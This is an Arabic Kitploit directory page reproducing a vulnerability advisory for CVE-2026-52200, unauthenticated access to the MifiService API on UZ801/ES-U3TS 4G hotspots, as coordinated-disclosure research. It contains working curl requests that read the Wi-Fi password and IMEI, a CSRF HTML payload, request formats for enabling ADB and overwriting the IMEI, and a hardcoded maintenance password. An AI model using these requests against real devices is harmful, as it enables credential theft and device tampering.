Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lamaper/cve-2026-52200
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالتدقيق التكوينجمع المعلوماتأمن الويباختبار الاختراق
GitHublamaper/cve-2026-52200

CVE-2026-52200

نشرة أمنية تفصّل ثغرة التحكم المكسور في الوصول في واجهة برمجة تطبيقات الويب MifiService الخاصة بأجهزة UZ801/ES-U3TS، مما يسمح باستخراج البيانات دون مصادقة، وتعديل الإعدادات، وإعادة تشغيل الجهاز. تتضمن إثباتات المفاهيم (PoCs) وإجراءات التخفيف.

عرض المستودع
8منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

UZ801 / ES-U3TS MifiService ثغرة التحكم في الوصول المعطوب

استشارة أمنية وملاحظات تقنية حول ثغرة التحكم في الوصول المعطوب في واجهة إدارة الويب المدمجة التي يعرضها MifiService.apk على منصة Wi-Fi المحمولة 4G LTE الخاصة بـ OEM / العلامة البيضاء UZ801_v2.1، والتي تُسوَّق أيضًا باسم ES-U3TS.

يهدف هذا المستودع إلى دعم الإفصاح المنسق وتعيين CVE. وهو يركز على أدلة تقنية قابلة لإعادة الإنتاج وغير مسلحة.

ملخص

يعرض الجهاز المتأثر نقطة نهاية إدارة HTTP قائمة على Jetty على:

root@kitploit:~
http://192.168.100.1/ajax

يتم تنفيذ موزع طلبات الواجهة الخلفية في:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

على الرغم من أن واجهة الويب تعرض صفحة تسجيل دخول، إلا أن الواجهة الخلفية لا تفرض جلسة مصادقة صالحة من جانب الخادم لمعظم وظائف الإدارة. نتيجة لذلك، يمكن لمهاجم على الشبكة المجاورة استدعاء عمليات funcNo الحساسة مباشرة دون مصادقة.

يشمل التأثير المؤكد:

  • استخراج كلمة مرور Wi-Fi الحالية كنص واضح
  • استخراج IMEI ومعلومات البرنامج الثابت وحالة SIM وتكوين الشبكة
  • استخراج تكوين DHCP وفلتر MAC
  • تعديل واستمرار تكوين الإدارة دون مصادقة
  • تشغيل إعادة تعيين التكوين وإعادة تشغيل الجهاز دون مصادقة

تم تأكيد وظائف إضافية عالية الخطورة من خلال التحليل الثابت، بما في ذلك:

  • إعادة التشغيل إلى محمل الإقلاع
  • تمكين أوضاع USB المخفية ADB / Qualcomm Diag وإعادة التشغيل
  • وظيفة الكتابة فوق IMEI غير الموثقة

النطاق والتسمية

يبدو أن العتاد المختبر ينتمي إلى عائلة أجهزة OEM / العلامة البيضاء. المطور الأصلي الدقيق غير معروف حاليًا، ولم يتم تحديد جهة اتصال أمنية موثوقة من البائع حتى الآن.

لذلك تستخدم هذه الاستشارة التسمية التالية للمنتج:

  • المنصة: UZ801_v2.1
  • الاسم التسويقي الملاحظ: ES-U3TS
  • البرنامج الثابت الملاحظ: UZ801-V3.4.3
  • التطبيق الملاحظ: MifiService.apk
  • الحزمة الملاحظة: com.mifiservice.hello

إذا تم العثور على علامات تجارية أو موزعين إضافيين يشحنون نفس البرنامج الثابت وAPK وأصول الويب وسلوك funcNo، فيجب التعامل معهم كمتغيرات متأثرة محتملة لنفس قاعدة التعليمات البرمجية.

المكوّن المتأثر

  • نقطة نهاية Web API /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

السبب الجذري

هذه ليست في المقام الأول مشكلة بيانات اعتماد افتراضية.

السبب الجذري هو التحكم في الوصول المعطوب في واجهة برمجة التطبيقات الخلفية:

  • لا يتم فرض جلسة مصادقة من جانب الخادم لمعظم طلبات الإدارة
  • لا توجد حماية CSRF
  • لا يوجد تحقق من Origin
  • لا يوجد تحقق من Referer
  • لا يلزم وجود ملف تعريف ارتباط جلسة أو رمز مميز لمعظم الوظائف الحساسة

توجد وظيفة تسجيل الدخول، لكنها لا توفر حدود ترخيص ذات معنى لغالبية واجهة برمجة تطبيقات الإدارة.

نموذج التهديد

ناقل الهجوم الأساسي:

  • مهاجم على الشبكة المجاورة متصل بنقطة اتصال الجهاز

ناقل الهجوم الثانوي:

  • استغلال CSRF القائم على المتصفح / القيادة أثناء التصفح ضد ضحية متصلة حاليًا بشبكة الجهاز المحلية

هذا ليس هجومًا عن بُعد معرضًا للإنترنت افتراضيًا. يجب على المهاجم إما:

  • أن يكون لديه وصول مباشر من الطبقة 2 / الطبقة 3 إلى 192.168.100.1، أو
  • إجبار متصفح ضحية متصل على إرسال طلبات إلى نقطة نهاية الجهاز

حالة الأدلة

جميع النتائج أدناه مدرجة كوظائف متأثرة لنفس مشكلة التحكم في الوصول المعطوب.
حيثما كان ذلك مناسبًا، يتم تمييز كل عنصر صراحةً على أنه إما:

  • تم التحقق منه مباشرة
  • مؤكد بالتحليل الثابت

يتم الحفاظ على هذا التمييز من أجل الدقة. لا يتم تصنيف الوظائف عالية الخطورة على أنها مختبرة مباشرة عندما لم يتم تنفيذها عمدًا على عتاد عام.

النتائج التقنية حسب مجموعة الوظائف

كشف المعلومات دون مصادقة

تعديل التكوين دون مصادقة

إجراءات تخريبية / إدارية دون مصادقة

وظائف غير موثقة أو بأسلوب الصيانة

funcNoالوصفالحالةملاحظات

حالة البائع

  • البائع الأصلي المنبع: غير معروف
  • نوع المنتج: منصة موجهات متنقلة OEM / العلامة البيضاء
  • جهة اتصال PSIRT / أمنية موثوقة: غير محددة
  • حالة الإفصاح الحالية: البائع غير قابل للوصول / لا توجد قناة أمنية مؤكدة للبائع

في وقت كتابة هذا التقرير، يبدو أن الجهاز يُباع عبر قنوات OEM / الموزعين مع علامات تجارية غير متناسقة أو غائبة، ولم يتم إنشاء اتصال موثوق بمطور البائع الأصلي.

أمثلة PoC آمنة

الأمثلة أدناه مقصودة عمدًا لتكون قراءة فقط أو تحققًا منخفض التأثير. وهي مدرجة لإظهار الثغرة دون توفير سير عمل استغلال مسلح.

1. قراءة كلمة مرور Wi-Fi الحالية دون مصادقة

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

السلوك المتوقع:

  • يعيد JSON
  • يتضمن ssid
  • يتضمن pwd كنص واضح

2. قراءة معلومات معرف الجهاز دون مصادقة

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

السلوك المتوقع:

  • يعيد JSON
  • يتضمن imei
  • يتضمن fwversion

3. إظهار وصول الكتابة المستمر غير المصرح به باستخدام حقل منخفض المخاطر

قراءة اللغة الحالية:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

تعيين اللغة:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

استعادة القيمة الأصلية بعد ذلك.

4. مفهوم CSRF القائم على المتصفح

لا تفرض نقطة النهاية هذه حالة جلسة أو تحققًا من Origin / Referer. لذلك يمكن إساءة استخدام متصفح ضحية متصل لإرسال طلبات في الخلفية.

صفحة إثبات الحد الأدنى:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

هذا المثال مقصور عمدًا على رقم وظيفة للقراءة فقط. لا تنشره ضد المستخدمين أو أجهزة الإنتاج.

تنسيقات الطلبات غير العامة / عالية الخطورة

تنسيقات JSON التالية موثقة للتحليل الدفاعي والفرز فقط. لا تكون مصحوبة بخطوات تنفيذ هنا.

2001 - تمكين واجهات التصحيح المخفية

root@kitploit:~
{"funcNo":2001}

السلوك الملاحظ في الكود:

  • ينفذ setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • ينفذ sync
  • يعيد تشغيل الجهاز

2004 - مسار الكتابة فوق IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

السلوك الملاحظ في الكود:

  • يستدعي مسارًا مكافئًا لـ AT+WRIMEI=<value>
  • يتحقق من النجاح عبر مسار قراءة IMEI متابعة

لا يتم تضمين أي اختبار مباشر عام هنا بسبب مخاوف قانونية ومتعلقة بالامتثال وسلامة الجهاز.

مقتطفات الأدلة

مثال استجابة دون مصادقة لـ 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

مثال استجابة دون مصادقة لـ 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

لماذا هذا مرشح CVE

هذه المشكلة مرشح قوي لـ CVE لأنها:

  • قابلة لإعادة الإنتاج على جهاز يتحكم فيه العميل
  • يمكن الوصول إليها من قبل مهاجم على الشبكة المجاورة
  • لا تعتمد على تعديل مادي غير موثق
  • ليست مجرد مشكلة كلمة مرور افتراضية
  • مؤثرة عبر السرية والنزاهة والتوافر

التصنيف المقترح:

  • CWE-306 غياب المصادقة للوظائف الحرجة
  • CWE-862 غياب التفويض

CVSS المقترح:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

حالة الإفصاح

  • اكتمل التحليل الثابت: 2026-05-11
  • اكتمل التحقق المباشر: 2026-05-12
  • اكتمل إعداد الاتصال بالبائع: 2026-05-12
  • أُعدت مسودة الاستشارة العامة: 2026-05-12

التخفيفات

  • اشتراط جلسة مصادقة صالحة من جانب الخادم لجميع وظائف الإدارة
  • رفض جميع طلبات funcNo الحساسة دون مصادقة
  • إضافة حماية CSRF
  • التحقق من Origin و Referer
  • إزالة نقاط نهاية الصيانة غير الموثقة من إصدارات الإنتاج
  • عدم كشف بيانات اعتماد Wi-Fi أبدًا من خلال استجابات API دون مصادقة

إشعار قانوني وسلامة

هذا المستودع مخصص للبحث الدفاعي والإفصاح عن الثغرات والتنسيق. الأمثلة العامة مقصورة عمدًا على التحقق منخفض المخاطر. الوظائف عالية الخطورة موثقة فقط بالقدر اللازم للمعالجة وفرز CVE.

تنزيل الأداة
funcNoالوصفالحالةملاحظات
1002قراءة SSID وعنوان IP للجهاز وDNS وكلمة مرور Wi-Fiتم التحقق منه مباشرةيعيد كلمة مرور Wi-Fi كنص واضح
1009قراءة وضع تشفير Wi-Fi وكلمة المرورتم التحقق منه مباشرةيعيد كلمة مرور Wi-Fi كنص واضح
1011قراءة نطاق DHCP وDNS وقائمة العملاءتم التحقق منه مباشرةمفيد للاستطلاع المحلي
1015قراءة حالة SIMتم التحقق منه مباشرةيعيد حالة SIM
1029قراءة IMEI والبرنامج الثابت والشركة المصنعة ومعلومات الإشارةتم التحقق منه مباشرةيعيد هوية الجهاز الحساسة
1052قراءة وضع فلتر MAC والإدخالات المكونةتم التحقق منه مباشرةيكشف السياسة والفتحات المكونة
2002قراءة فتحة SIM النشطةتم التحقق منه مباشرةيكشف حالة وقت التشغيل
funcNoالوصفالحالةملاحظات
1004تغيير وضع الاتصالمؤكد بالتحليل الثابتلم يُلاحظ فرض جلسة
1005تغيير وضع الشبكة المفضلمؤكد بالتحليل الثابتتأثير تشغيلي مرتفع
1007تغيير SSID / الحد الأقصى لعدد المحطاتمؤكد بالتحليل الثابتيستمر التكوين ويعيد تشغيل منطق نقطة الوصول
1010تغيير وضع تشفير Wi-Fi / كلمة المرورمؤكد بالتحليل الثابتتأثير مرتفع على السرية
1012تغيير الإعدادات المتعلقة بـ DHCP/DNSمؤكد بالتحليل الثابتعبث بالشبكة المحلية
1016/1017/1018قراءة / تعيين / تبديل ملف تعريف APNمؤكد بالتحليل الثابتتعديل سلوك WAN
1031تغيير اللغة واستمرارهاتم التحقق منه مباشرةيُستخدم كدليل منخفض المخاطر على وصول الكتابة
1053/1054/1055تغيير سلوك فلتر MAC والإدخالاتمؤكد بالتحليل الثابتعبث بالتحكم في الوصول إلى الشبكة
funcNoالوصفالحالةملاحظات
1013إعادة تشغيل الجهازتم التحقق منه مباشرةDoS / انقطاع الخدمة
1014إعادة تعيين تكوين التطبيق/الشبكة وإعادة التشغيلتم التحقق منه مباشرةليس مسحًا كاملاً لبيانات مستخدم Android
2000إعادة التشغيل إلى محمل الإقلاعتم التحقق منه مباشرةتأثير تشغيلي مرتفع
2001تمكين تكوين ADB/Diag USB المخفي وإعادة التشغيلمؤكد بالتحليل الثابتمسار صيانة خطير
2003
مسار كلمة مرور صيانة مخفي
مؤكد بالتحليل الثابت
يستخدم admin8888 مكتوبًا بشكل ثابت؛ يبدو السلوك جزئيًا / متبقيًا
2004الكتابة فوق IMEIمؤكد بالتحليل الثابتيستدعي مسار أمر AT؛ لم يُنفذ علنًا